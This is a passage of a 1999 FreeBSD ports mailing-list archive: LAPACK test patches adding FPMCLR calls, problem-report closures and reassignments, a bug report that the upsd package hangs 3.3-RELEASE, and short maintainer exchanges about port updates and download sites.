CCHKTZ, CDRVGB, + $ CDRVGE, CDRVGT, CDRVHE, CDRVHP, CDRVLS, CDRVPB, + - $ CDRVPO, CDRVPP, CDRVPT, CDRVSP, CDRVSY + + $ CDRVPO, CDRVPP, CDRVPT, CDRVSP, CDRVSY, FPMCLR + * .. + * .. Scalars in Common .. + LOGICAL LERR, OK + @@ -140,6 +140,7 @@ + * .. + * .. Executable Statements .. + * + + CALL FPMCLR( ) + S1 = SECOND( ) + LDA = NMAX + FATAL = .FALSE. diff -crN lapack/patches/patch-ay lapack.new/patches/patch-ay *** lapack/patches/patch-ay Thu Jan 1 01:00:00 1970 --- lapack.new/patches/patch-ay Wed Dec 22 11:37:58 1999 *************** *** 0 **** --- 1,19 ---- + --- TESTING/LIN/dchkaa.f.orig Thu Nov 4 19:27:22 1999 + +++ TESTING/LIN/dchkaa.f Wed Dec 22 11:37:13 1999 + @@ -118,7 +118,7 @@ + $ DCHKQP, DCHKQR, DCHKRQ, DCHKSP, DCHKSY, DCHKTB, + $ DCHKTP, DCHKTR, DCHKTZ, DDRVGB, DDRVGE, DDRVGT, + $ DDRVLS, DDRVPB, DDRVPO, DDRVPP, DDRVPT, DDRVSP, + - $ DDRVSY + + $ DDRVSY, FPMCLR + * .. + * .. Scalars in Common .. + LOGICAL LERR, OK + @@ -138,6 +138,7 @@ + * .. + * .. Executable Statements .. + * + + CALL FPMCLR( ) + S1 = DSECND( ) + LDA = NMAX + FATAL = .FALSE. diff -crN lapack/patches/patch-az lapack.new/patches/patch-az *** lapack/patches/patch-az Thu Jan 1 01:00:00 1970 --- lapack.new/patches/patch-az Wed Dec 22 12:51:42 1999 *************** *** 0 **** --- 1,19 ---- + --- TESTING/LIN/zchkaa.f.orig Thu Nov 4 19:27:22 1999 + +++ TESTING/LIN/zchkaa.f Wed Dec 22 12:51:16 1999 + @@ -120,7 +120,7 @@ + $ ZCHKQ3, ZCHKQL, ZCHKQP, ZCHKQR, ZCHKRQ, ZCHKSP, + $ ZCHKSY, ZCHKTB, ZCHKTP, ZCHKTR, ZCHKTZ, ZDRVGB, + $ ZDRVGE, ZDRVGT, ZDRVHE, ZDRVHP, ZDRVLS, ZDRVPB, + - $ ZDRVPO, ZDRVPP, ZDRVPT, ZDRVSP, ZDRVSY + + $ ZDRVPO, ZDRVPP, ZDRVPT, ZDRVSP, ZDRVSY, FPMCLR + * .. + * .. Scalars in Common .. + LOGICAL LERR, OK + @@ -140,6 +140,7 @@ + * .. + * .. Executable Statements .. + * + + CALL FPMCLR( ) + S1 = DSECND( ) + LDA = NMAX + FATAL = .FALSE. diff -crN lapack/patches/patch-ba lapack.new/patches/patch-ba *** lapack/patches/patch-ba Thu Jan 1 01:00:00 1970 --- lapack.new/patches/patch-ba Wed Dec 22 13:51:32 1999 *************** *** 0 **** --- 1,10 ---- + --- TIMING/EIG/ztimee.f.orig Wed Dec 22 13:50:25 1999 + +++ TIMING/EIG/ztimee.f Wed Dec 22 13:51:03 1999 + @@ -327,6 +327,7 @@ + * .. + * .. Executable Statements .. + * + + CALL FPMCLR( ) + S1 = DSECND( ) + FATAL = .FALSE. + NEP = .FALSE. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 11:14:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9E64215658; Wed, 22 Dec 1999 11:14:10 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA28548; Wed, 22 Dec 1999 11:14:10 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 11:14:10 -0800 (PST) From: Message-Id: <199912221914.LAA28548@freefall.freebsd.org> To: howardjp@wam.umd.edu, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15263: [PATCH] Updates for devel/freelibiberty Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] Updates for devel/freelibiberty State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 11:11:19 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 11:20: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7D82414EE3 for ; Wed, 22 Dec 1999 11:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA29192; Wed, 22 Dec 1999 11:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 11:20:02 -0800 (PST) Message-Id: <199912221920.LAA29192@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Chris Piazza Subject: Re: ports/15625: Update port: devel/libgnugetopt Reply-To: Chris Piazza Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15625; it has been noted by GNATS. From: Chris Piazza To: Andrey Zakhvatov Cc: freebsd-gnats-submit@freebsd.org Subject: Re: ports/15625: Update port: devel/libgnugetopt Date: Wed, 22 Dec 1999 11:16:33 -0800 On Wed, Dec 22, 1999 at 01:07:55PM +0300, Andrey Zakhvatov wrote: > This is a patch to update devel/libgnugetopt port. > > > diff -Nru libgnugetopt/Makefile libgnugetopt-1.1/Makefile > --- libgnugetopt/Makefile Wed Aug 25 14:14:00 1999 > +++ libgnugetopt-1.1/Makefile Wed Dec 22 13:03:09 1999 > @@ -8,7 +8,7 @@ > > DISTNAME= libgnugetopt-1.1 > CATEGORIES= devel > -MASTER_SITES= http://www.geocities.com/SiliconValley/Code/3502/ > +MASTER_SITES= http://members.tripod.com/zakhvatov/ Hi Andrey, Tripod seems to be truncating my download. Maybe you can put the distfile in ~andy/public_html and use http://www.freebsd.org/~andy/ as the MASTER_SITE? -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 11:21:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D1B0E15614; Wed, 22 Dec 1999 11:21:02 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA29353; Wed, 22 Dec 1999 11:21:02 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 11:21:02 -0800 (PST) From: Message-Id: <199912221921.LAA29353@freefall.freebsd.org> To: jjreynold@home.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15433: Small update to flexbackup port. Maintainer address change. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Small update to flexbackup port. Maintainer address change. State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 11:19:24 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 11:23:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 66E3015022; Wed, 22 Dec 1999 11:23:09 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA29625; Wed, 22 Dec 1999 11:23:09 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 22 Dec 1999 11:23:09 -0800 (PST) From: Message-Id: <199912221923.LAA29625@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, tom@FreeBSD.org Subject: Re: ports/15626: error description in MESSAGE Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: error description in MESSAGE Responsible-Changed-From-To: freebsd-ports->tom Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 22 11:22:50 PST 1999 Responsible-Changed-Why: Over to maintainer. Tom, maybe there's a better solution to this? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 11:27:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1DD2414EFB; Wed, 22 Dec 1999 11:27:47 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA30113; Wed, 22 Dec 1999 11:27:47 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 22 Dec 1999 11:27:47 -0800 (PST) From: Message-Id: <199912221927.LAA30113@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, cpiazza@FreeBSD.org Subject: Re: ports/14874: Eterm 0.8.10 was released Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Eterm 0.8.10 was released Responsible-Changed-From-To: freebsd-ports->cpiazza Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 22 11:27:39 PST 1999 Responsible-Changed-Why: I'll take this To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 11:28: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BA7E215537; Wed, 22 Dec 1999 11:27:59 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA30213; Wed, 22 Dec 1999 11:27:59 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 22 Dec 1999 11:27:59 -0800 (PST) From: Message-Id: <199912221927.LAA30213@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, cpiazza@FreeBSD.org Subject: Re: ports/15628: Eterm mis-handles ^J, and also glitches with setuid operation Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Eterm mis-handles ^J, and also glitches with setuid operation Responsible-Changed-From-To: freebsd-ports->cpiazza Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 22 11:27:52 PST 1999 Responsible-Changed-Why: I'll take this To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 12:10: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 582A014EFB for ; Wed, 22 Dec 1999 12:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA34923; Wed, 22 Dec 1999 12:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CF9BD14DDF; Wed, 22 Dec 1999 12:02:52 -0800 (PST) Message-Id: <19991222200252.CF9BD14DDF@hub.freebsd.org> Date: Wed, 22 Dec 1999 12:02:52 -0800 (PST) From: a.dewit@niwa.cri.nz To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15634: upsd-2.0 package hangs 3.3-RELEASE Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15634 >Category: ports >Synopsis: upsd-2.0 package hangs 3.3-RELEASE >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 12:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Arian de Wit >Release: 3.3-RELEASE >Organization: NIWA >Environment: FreeBSD dogberry.ham.niwa.cri.nz 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Tue Dec 14 16:13:53 NZDT 1999 root@dogberry.ham.niwa.cri.nz:/usr/src/sys/compile/DOGBERRY i386 >Description: The upsd-2.0 package worked a treat on FreeBSD 3.2-RELEASE with my APC Smart-UPS. Installing it exactly the same way on 3.3-RELEASE causes a nasty hang when the upsd tries to start. The host seems to be completely dead, can't even be pinged and Ctrl+Alt+Del doesn't work. Requires a power-cycle to recover. The maintainer listed for this package is alexis@ww.net. I have contacted this person and received the following reply: "While indeed I have written the software many years ago I haven't taken a look into it ever since. I would not have a clue what has happened to it and it is definitely not much of a use to have me listed as the maintainer of the port. Sorry to disappoint you." >How-To-Repeat: Install upsd-2.0 on 3.3-RELEASE as root. Launch with a shell script containing: #!/bin/sh [ -x /usr/local/sbin/upsd ] && /usr/local/sbin/upsd && echo -n ' upsd' >Fix: None known. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 12:13:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.af.airnet.ne.jp (mail.af.airnet.ne.jp [210.159.66.49]) by hub.freebsd.org (Postfix) with ESMTP id AFFF2155B2 for ; Wed, 22 Dec 1999 12:13:07 -0800 (PST) (envelope-from imura@cs.titech.ac.jp) Received: from imura.cs.titech.ac.jp (tok294.airnet.ne.jp [210.159.89.38]) by mail.af.airnet.ne.jp (8.8.8/3.6W/06/13/98-AF.AIRNET.NE.JP) with ESMTP id FAA11282; Thu, 23 Dec 1999 05:13:01 +0900 Posted-Date: Thu, 23 Dec 1999 05:12:16 +0900 (JST) To: andrews@technologist.com Cc: freebsd-ports@FreeBSD.ORG, ade@lovett.com Subject: Re: ports/15434: new port: devel/kdevelop From: "R. Imura" In-Reply-To: References: <19991216033056A.imura@cs.titech.ac.jp> X-Mailer: Mew version 1.94b20 on Emacs 19.34 / Mule 2.3 =?iso-2022-jp?B?KBskQkt2RSYyVhsoQik=?= X-Prom-Mew: Prom-Mew 1.93.4 (procmail reader for Mew) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19991223051215U.imura@cs.titech.ac.jp> Date: Thu, 23 Dec 1999 05:12:15 +0900 X-Dispatcher: imput version 990401(IM113) Lines: 23 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On 15-Dec-99 R. Imura wrote: > >> > o The port depends on many other ports. Year, if they are installed, > >> > kdevelop will be more power-full and we will be happy, but they are > >> > not really **nessesary**. > > > > It would be. But I meant the following optional RUN_DEPENDS. :) > > > > RUN_DEPENDS= autoconf:${PORTSDIR}/devel/autoconf \ > > You're both wrong. _THIS_ must be installed for kdevelop to serve any useful > purpose at all. Although the rest _are_ optional. ;-) You are right! What about automake? # I must modify my port. > I am still waiting to hear (valid) reasons why the kdelibs11/qt142 ports have > not been upgraded. You had better send all related patches, if you want. --- R. Imura To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 12:18:36 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E58F1154B5; Wed, 22 Dec 1999 12:18:34 -0800 (PST) (envelope-from jmz@FreeBSD.org) Received: (from jmz@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA35947; Wed, 22 Dec 1999 12:18:34 -0800 (PST) (envelope-from jmz@FreeBSD.org) Date: Wed, 22 Dec 1999 12:18:34 -0800 (PST) From: Message-Id: <199912222018.MAA35947@freefall.freebsd.org> To: jmz@FreeBSD.org, freebsd-ports@FreeBSD.org, jmz@FreeBSD.org Subject: Re: ports/15630: [PATCH] math/lapack port partially broken Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] math/lapack port partially broken Responsible-Changed-From-To: freebsd-ports->jmz Responsible-Changed-By: jmz Responsible-Changed-When: Wed Dec 22 12:17:47 PST 1999 Responsible-Changed-Why: I am the maintainer of this port. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 12:37:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B239015624; Wed, 22 Dec 1999 12:37:19 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA37589; Wed, 22 Dec 1999 12:37:19 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 12:37:19 -0800 (PST) From: Message-Id: <199912222037.MAA37589@freefall.freebsd.org> To: dima@Chg.RU, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15569: Small fix for net/xferstats Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Small fix for net/xferstats State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 12:36:19 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 13:20:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2DA47155A7; Wed, 22 Dec 1999 13:20:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA41909; Wed, 22 Dec 1999 13:20:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 13:20:21 -0800 (PST) From: Message-Id: <199912222120.NAA41909@freefall.freebsd.org> To: tkato@prontomail.ne.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15466: Update port: devel/gide to 0.1.6 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: devel/gide to 0.1.6 State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 13:15:21 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 13:22:43 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 589B1155A7; Wed, 22 Dec 1999 13:22:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA42109; Wed, 22 Dec 1999 13:22:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Wed, 22 Dec 1999 13:22:41 -0800 (PST) From: Message-Id: <199912222122.NAA42109@freefall.freebsd.org> To: ust@cert.siemens.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15622: Build fails in ports/editors/staroffice5 with USE_CDROM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Wed Dec 22 13:22:23 PST 1999 State-Changed-Why: Duplicate of ports/15623. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 13:33: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A604415690; Wed, 22 Dec 1999 13:32:56 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA43253; Wed, 22 Dec 1999 13:32:56 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Wed, 22 Dec 1999 13:32:56 -0800 (PST) From: Message-Id: <199912222132.NAA43253@freefall.freebsd.org> To: tobez@plab.ku.dk, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15527: www/mathopd upgrade: 1.3 => 1.3pl2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: www/mathopd upgrade: 1.3 => 1.3pl2 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Wed Dec 22 13:31:59 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 14:16:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ED49614C33; Wed, 22 Dec 1999 14:16:39 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA47205; Wed, 22 Dec 1999 14:16:39 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 14:16:39 -0800 (PST) From: Message-Id: <199912222216.OAA47205@freefall.freebsd.org> To: alex@big.endian.de, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15560: update port to 0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update port to 0.2 State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 14:16:12 PST 1999 State-Changed-Why: Change commited under ports/15263 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 14:28:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5BAAB15707; Wed, 22 Dec 1999 14:28:31 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA48610; Wed, 22 Dec 1999 14:28:31 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 14:28:31 -0800 (PST) From: Message-Id: <199912222228.OAA48610@freefall.freebsd.org> To: andrews@technologist.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15428: update port: astro/xearth 1.0 -> 1.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update port: astro/xearth 1.0 -> 1.1 State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 14:27:58 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 15: 0:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 55FAD156BA; Wed, 22 Dec 1999 15:00:40 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA51486; Wed, 22 Dec 1999 15:00:40 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 15:00:40 -0800 (PST) From: Message-Id: <199912222300.PAA51486@freefall.freebsd.org> To: tkato@prontomail.ne.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15538: Update port: x11/wmmatrix Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: x11/wmmatrix State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 14:58:43 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 15:48: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1CF8014FEE; Wed, 22 Dec 1999 15:48:08 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA55080; Wed, 22 Dec 1999 15:48:08 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 22 Dec 1999 15:48:08 -0800 (PST) From: Message-Id: <199912222348.PAA55080@freefall.freebsd.org> To: ust@cert.siemens.de, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15622: Build fails in ports/editors/staroffice5 with USE_CDROM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM State-Changed-From-To: closed->open State-Changed-By: cpiazza State-Changed-When: Wed Dec 22 15:47:02 PST 1999 State-Changed-Why: 15622 was closed as a duplicate of 15623, and vice versa. Leave one of them open. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 17:54:33 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E91CE1592B; Wed, 22 Dec 1999 17:54:30 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA65060; Wed, 22 Dec 1999 17:54:30 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 17:54:30 -0800 (PST) From: Message-Id: <199912230154.RAA65060@freefall.freebsd.org> To: saper@system.pl, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15613: Update dia port to 0.82 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update dia port to 0.82 State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 17:51:48 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 18:37:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8ED0B15633; Wed, 22 Dec 1999 18:37:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA68127; Wed, 22 Dec 1999 18:37:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 18:37:21 -0800 (PST) From: Message-Id: <199912230237.SAA68127@freefall.freebsd.org> To: k5@cheerful.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15282: unfetchable MASTER_SITES change: archivers/linux_rar Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: unfetchable MASTER_SITES change: archivers/linux_rar State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 18:36:23 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 22:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 78BCB14DBD for ; Wed, 22 Dec 1999 22:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA83253; Wed, 22 Dec 1999 22:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 22:40:02 -0800 (PST) Message-Id: <199912230640.WAA83253@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Andrey Zakhvatov Subject: Re: ports/15625: Update port: devel/libgnugetopt Reply-To: Andrey Zakhvatov Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR 